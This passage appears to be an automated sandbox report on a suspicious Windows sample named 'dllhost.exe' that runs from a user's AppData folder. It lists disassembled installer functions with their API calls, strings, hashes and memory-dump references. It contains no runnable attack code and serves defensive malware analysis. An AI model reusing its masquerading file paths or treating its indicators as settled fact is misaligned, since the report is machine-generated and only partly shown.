                                                                              • Opcode Fuzzy Hash: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
                                                                              • Instruction Fuzzy Hash: CD015E71900218BADB00DB94DD85FFFBBBCAF95711F10412BBA51B61D0D7B4A9018BA4
                                                                              Function 00401DB3 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 43COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetDC.USER32(?), ref: 00401DB6
                                                                              • GetDeviceCaps.GDI32(00000000,0000005A,00000048), ref: 00401DD0
                                                                              • MulDiv.KERNEL32 ref: 00401DD8
                                                                              • ReleaseDC.USER32(?,00000000), ref: 00401DE9
                                                                              • CreateFontIndirectW.GDI32(0040CDB0), ref: 00401E38
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000017.00000002.487603088.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000017.00000002.487158380.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487620969.0000000000408000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.000000000040A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000418000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000422000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000427000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.000000000042C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.000000000042F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000435000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000459000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.489722095.000000000045C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.489722095.000000000046F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.489722095.00000000004A3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_23_2_400000_dllhost.jbxd
                                                                              Similarity
                                                                              • API ID: CapsCreateDeviceFontIndirectRelease
                                                                              • String ID: Calibri
                                                                              • API String ID: 3808545654-1409258342
                                                                              • Opcode ID: 32b3ac885727d1e190cdd40c39b4cdf091ab3af3085104150676e708dd364a64
                                                                              • Instruction ID: beb1058faab58ab776b37266111e77616320e0f2a6455f46a6b6c1c153f06785
                                                                              • Opcode Fuzzy Hash: 32b3ac885727d1e190cdd40c39b4cdf091ab3af3085104150676e708dd364a64
                                                                              • Instruction Fuzzy Hash: B6015272558241EFE7006BB0AF8AA9A7FB4AB55301F10497EF241B61E2CA7800458B2D
                                                                              Function 00402DD7 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402DF5
                                                                              • MulDiv.KERNEL32 ref: 00402E20
                                                                              • wsprintfW.USER32 ref: 00402E30
                                                                              • SetWindowTextW.USER32(?,?), ref: 00402E40
                                                                              • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402E52
                                                                              Strings
                                                                              • verifying installer: %d%%, xrefs: 00402E2A
                                                                              Memory Dump Source
                                                                              • Source File: 00000017.00000002.487603088.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000017.00000002.487158380.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487620969.0000000000408000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.000000000040A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000418000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000422000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000427000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.000000000042C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.000000000042F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000435000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000459000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.489722095.000000000045C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.489722095.000000000046F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.489722095.00000000004A3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_23_2_400000_dllhost.jbxd
                                                                              Similarity
                                                                              • API ID: Text$ItemTimerWindowwsprintf
                                                                              • String ID: verifying installer: %d%%
                                                                              • API String ID: 1451636040-82062127
                                                                              • Opcode ID: e049c72b028903268a13e0303fe007745629d422319b61ed44a985218b4f833f
                                                                              • Instruction ID: 725db9d4d41e60ee2dd5d311e5346f84fbed97106a71cca60d70b9a4d06edbb5
                                                                              • Opcode Fuzzy Hash: e049c72b028903268a13e0303fe007745629d422319b61ed44a985218b4f833f
                                                                              • Instruction Fuzzy Hash: 73014471640208ABDF209F60DD49FAA3B69EB00708F008039FA05F91D0DBB989558B99
                                                                              Function 004028A7 Relevance: 9.1, APIs: 6, Instructions: 86memoryfileCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000), ref: 004028FB
                                                                              • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 00402917
                                                                              • GlobalFree.KERNEL32(?), ref: 00402950
                                                                              • GlobalFree.KERNEL32(00000000), ref: 00402963
                                                                              • CloseHandle.KERNEL32(?), ref: 0040297B
                                                                              • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000), ref: 0040298F
                                                                              Memory Dump Source
                                                                              • Source File: 00000017.00000002.487603088.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000017.00000002.487158380.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487620969.0000000000408000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.000000000040A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000418000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000422000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000427000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.000000000042C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.000000000042F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000435000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000459000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.489722095.000000000045C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.489722095.000000000046F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.489722095.00000000004A3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_23_2_400000_dllhost.jbxd
                                                                              Similarity
                                                                              • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                                              • String ID:
                                                                              • API String ID: 2667972263-0
                                                                              • Opcode ID: 49a6233bec7a959410d96ab4a6536f428a311d60b3465505635374f74429998f
                                                                              • Instruction ID: c6e800f027f1e1b1e461e4fc783814b3910171fe2b09394c7840a14eb176b3fb
                                                                              • Opcode Fuzzy Hash: 49a6233bec7a959410d96ab4a6536f428a311d60b3465505635374f74429998f
                                                                              • Instruction Fuzzy Hash: 9821BFB1D00124BBDF206FA5DE49D9E7E79EF08364F10423AF954762E1CB794C419B98
                                                                              Function 00404A6C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 84stringCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • lstrlenW.KERNEL32(004236E8,004236E8,?,%u.%u%s%s,?,00000000,00000000,?,000000DC,00000000,?,000000DF), ref: 00404B0D
                                                                              • wsprintfW.USER32 ref: 00404B16
                                                                              • SetDlgItemTextW.USER32(?,004236E8), ref: 00404B29
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000017.00000002.487603088.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000017.00000002.487158380.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487620969.0000000000408000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.000000000040A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000418000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000422000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000427000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.000000000042C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.000000000042F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000435000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000459000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.489722095.000000000045C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.489722095.000000000046F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.489722095.00000000004A3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_23_2_400000_dllhost.jbxd
                                                                              Similarity
                                                                              • API ID: ItemTextlstrlenwsprintf
                                                                              • String ID: %u.%u%s%s$6B
                                                                              • API String ID: 3540041739-3884863406
                                                                              • Opcode ID: 95c3251a73d665659f4e5ef41dc4b3ed63ce9024b19b633afc4b02d7477ffd45
                                                                              • Instruction ID: 5e68f5a3766037a7274f1f000e531c578f4d2f2b22a3e42eca2e55653584bdbe
                                                                              • Opcode Fuzzy Hash: 95c3251a73d665659f4e5ef41dc4b3ed63ce9024b19b633afc4b02d7477ffd45
                                                                              • Instruction Fuzzy Hash: F111D8736481283BDB00656D9C45E9F329CDB81374F150237FE66F61D1D9788C2186EC
                                                                              Function 00402592 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 69stringCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • WideCharToMultiByte.KERNEL32(?,?,sarcoderma,000000FF,C:\Windows\Intragantes.geo,00000400,?,?,00000021), ref: 004025E2
                                                                              • lstrlenA.KERNEL32(C:\Windows\Intragantes.geo,?,?,sarcoderma,000000FF,C:\Windows\Intragantes.geo,00000400,?,?,00000021), ref: 004025ED
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000017.00000002.487603088.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000017.00000002.487158380.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487620969.0000000000408000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.000000000040A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000418000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000422000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000427000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.000000000042C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.000000000042F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000435000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000459000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.489722095.000000000045C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.489722095.000000000046F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.489722095.00000000004A3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_23_2_400000_dllhost.jbxd
                                                                              Similarity
                                                                              • API ID: ByteCharMultiWidelstrlen
                                                                              • String ID: C:\Windows\Intragantes.geo$sarcoderma
                                                                              • API String ID: 3109718747-3933101654
                                                                              • Opcode ID: 65361bfc3976c2d8786aa04713eb49f68c8b7b110319b8a2291aedbdf948cb04
                                                                              • Instruction ID: 514f5b9530cea4d9367e026ee51610d144416164e286c499b2b09fde189c8ffc
                                                                              • Opcode Fuzzy Hash: 65361bfc3976c2d8786aa04713eb49f68c8b7b110319b8a2291aedbdf948cb04
                                                                              • Instruction Fuzzy Hash: B8113B32A00200FFDB146FB18E8D99F76649F54345F20843BF502F22C1D9BC49415B5E
                                                                              Function 00401D57 Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetDlgItem.USER32(?,?), ref: 00401D5D
                                                                              • GetClientRect.USER32(00000000,?), ref: 00401D6A
                                                                              • LoadImageW.USER32 ref: 00401D8B
                                                                              • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D99
                                                                              • DeleteObject.GDI32(00000000), ref: 00401DA8
                                                                              Memory Dump Source
                                                                              • Source File: 00000017.00000002.487603088.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000017.00000002.487158380.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487620969.0000000000408000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.000000000040A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000418000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000422000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000427000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.000000000042C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.000000000042F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000435000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000459000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.489722095.000000000045C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.489722095.000000000046F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.489722095.00000000004A3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_23_2_400000_dllhost.jbxd
                                                                              Similarity
                                                                              • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                              • String ID:
                                                                              • API String ID: 1849352358-0
                                                                              • Opcode ID: 2e926fbddc9d53b4849064fbd2325b8602243f9cfaa17b252278c42eeb429d9a
                                                                              • Instruction ID: 477f9c078023e6e9cc07b453b9f7f3a7004dd49873a1bfc78c69f95ea128efdf
                                                                              • Opcode Fuzzy Hash: 2e926fbddc9d53b4849064fbd2325b8602243f9cfaa17b252278c42eeb429d9a
                                                                              • Instruction Fuzzy Hash: CAF0EC72604518AFDB01DBE4DE88CEEB7BCEB08341B14047AF641F61A1CA749D118B78
                                                                              Function 00405B1D Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,0040332A,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,7570D4C4,00403589,?,00000006,00000008,0000000A), ref: 00405B23
                                                                              • CharPrevW.USER32(?,00000000), ref: 00405B2D
                                                                              • lstrcatW.KERNEL32(?,0040A014,?,00000006,00000008,0000000A), ref: 00405B3F
                                                                              Strings
                                                                              • C:\Users\user\AppData\Local\Temp\, xrefs: 00405B1D
                                                                              Memory Dump Source
                                                                              • Source File: 00000017.00000002.487603088.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000017.00000002.487158380.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487620969.0000000000408000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.000000000040A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000418000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000422000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000427000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.000000000042C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.000000000042F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000435000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000459000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.489722095.000000000045C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.489722095.000000000046F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.489722095.00000000004A3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_23_2_400000_dllhost.jbxd
                                                                              Similarity
                                                                              • API ID: CharPrevlstrcatlstrlen
                                                                              • String ID: C:\Users\user\AppData\Local\Temp\
                                                                              • API String ID: 2659869361-4017390910
                                                                              • Opcode ID: 2d89e3346713fcbf25affea4869717dbbf7bb0cb650dc976aff6b925dbbb9e25
                                                                              • Instruction ID: c0ef0cb97c36de63e92d9fca1924244fe31698b984028f6787b43ddfdde79dcc
                                                                              • Opcode Fuzzy Hash: 2d89e3346713fcbf25affea4869717dbbf7bb0cb650dc976aff6b925dbbb9e25
                                                                              • Instruction Fuzzy Hash: 7FD0A731106530AAC1117B548C04DDF72AC9E46344342047FF201B70A1C77C2D6287FD
                                                                              Function 00402E5D Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • DestroyWindow.USER32 ref: 00402E70
                                                                              • GetTickCount.KERNEL32(00000000,0040303D,00000001,?,00000006,00000008,0000000A), ref: 00402E8E
                                                                              • CreateDialogParamW.USER32 ref: 00402EAB
                                                                              • ShowWindow.USER32(00000000,00000005), ref: 00402EB9
                                                                              Memory Dump Source
                                                                              • Source File: 00000017.00000002.487603088.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000017.00000002.487158380.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487620969.0000000000408000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.000000000040A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000418000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000422000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000427000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.000000000042C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.000000000042F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000435000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000459000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.489722095.000000000045C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.489722095.000000000046F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.489722095.00000000004A3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_23_2_400000_dllhost.jbxd
                                                                              Similarity
                                                                              • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                              • String ID:
                                                                              • API String ID: 2102729457-0
                                                                              • Opcode ID: d9dd720f51eef3d3fbe94177486472338db653888b87da4332a276649b206b5d
                                                                              • Instruction ID: fe37ef1f42e63d928baf9b7628c588a3f0f600393ee4f6b464cc40035c08f26a
                                                                              • Opcode Fuzzy Hash: d9dd720f51eef3d3fbe94177486472338db653888b87da4332a276649b206b5d
                                                                              • Instruction Fuzzy Hash: FAF03A30945620EFC7216B64FE0C99B7B65BB04B0174549BEF444F11A8CBB54881CA9C
                                                                              Function 00405224 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • IsWindowVisible.USER32(?), ref: 00405253
                                                                              • CallWindowProcW.USER32(?,?,?,?), ref: 004052A4
                                                                                • Part of subcall function 0040422D: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 0040423F
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000017.00000002.487603088.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000017.00000002.487158380.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487620969.0000000000408000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.000000000040A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000418000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000422000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000427000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.000000000042C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.000000000042F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000435000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000459000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.489722095.000000000045C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.489722095.000000000046F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.489722095.00000000004A3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_23_2_400000_dllhost.jbxd
                                                                              Similarity
                                                                              • API ID: Window$CallMessageProcSendVisible
                                                                              • String ID:
                                                                              • API String ID: 3748168415-3916222277
                                                                              • Opcode ID: 085acd60d741280dfa694cfa38d19dbe5f2a98386977293df9f6c8f4e56f0e62
                                                                              • Instruction ID: c9233ab90339d663537cd0f4838c8d9c3e37dbb77af5ce129741796423ccaa39
                                                                              • Opcode Fuzzy Hash: 085acd60d741280dfa694cfa38d19dbe5f2a98386977293df9f6c8f4e56f0e62
                                                                              • Instruction Fuzzy Hash: 4701717160060CABDF218F11ED80A9B3766EF94355F10447AF604752D0C77AAD929E2D
                                                                              Function 004038C5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • FreeLibrary.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00000000,7570D4C4,0040389D,004036B3,00000006,?,00000006,00000008,0000000A), ref: 004038DF
                                                                              • GlobalFree.KERNEL32(?), ref: 004038E6
                                                                              Strings
                                                                              • C:\Users\user\AppData\Local\Temp\, xrefs: 004038D7
                                                                              Memory Dump Source
                                                                              • Source File: 00000017.00000002.487603088.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000017.00000002.487158380.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487620969.0000000000408000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.000000000040A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000418000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000422000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000427000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.000000000042C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.000000000042F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000435000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000459000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.489722095.000000000045C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.489722095.000000000046F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.489722095.00000000004A3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_23_2_400000_dllhost.jbxd
                                                                              Similarity
                                                                              • API ID: Free$GlobalLibrary
                                                                              • String ID: C:\Users\user\AppData\Local\Temp\
                                                                              • API String ID: 1100898210-4017390910
                                                                              • Opcode ID: c5b968993c0533f4145da43d1685cce5539a5f76f40ddb7aa2d82094c30b15f3
                                                                              • Instruction ID: 4defd9e359f6bb8273ced32a5a12906ada9a5e6c3dc807c4d7f8d8681d186cd1
                                                                              • Opcode Fuzzy Hash: c5b968993c0533f4145da43d1685cce5539a5f76f40ddb7aa2d82094c30b15f3
                                                                              • Instruction Fuzzy Hash: 68E01233901520AFCA216F55ED04B5E77ADAF58B22F09417BF8807B2608B785C929BD8
                                                                              Function 00405B69 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Roaming,00402F2D,C:\Users\user\AppData\Roaming,C:\Users\user\AppData\Roaming,C:\Users\user\AppData\Roaming\dllhost.exe,C:\Users\user\AppData\Roaming\dllhost.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405B6F
                                                                              • CharPrevW.USER32(?,00000000), ref: 00405B7F
                                                                              Strings
                                                                              • C:\Users\user\AppData\Roaming, xrefs: 00405B69
                                                                              Memory Dump Source
                                                                              • Source File: 00000017.00000002.487603088.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
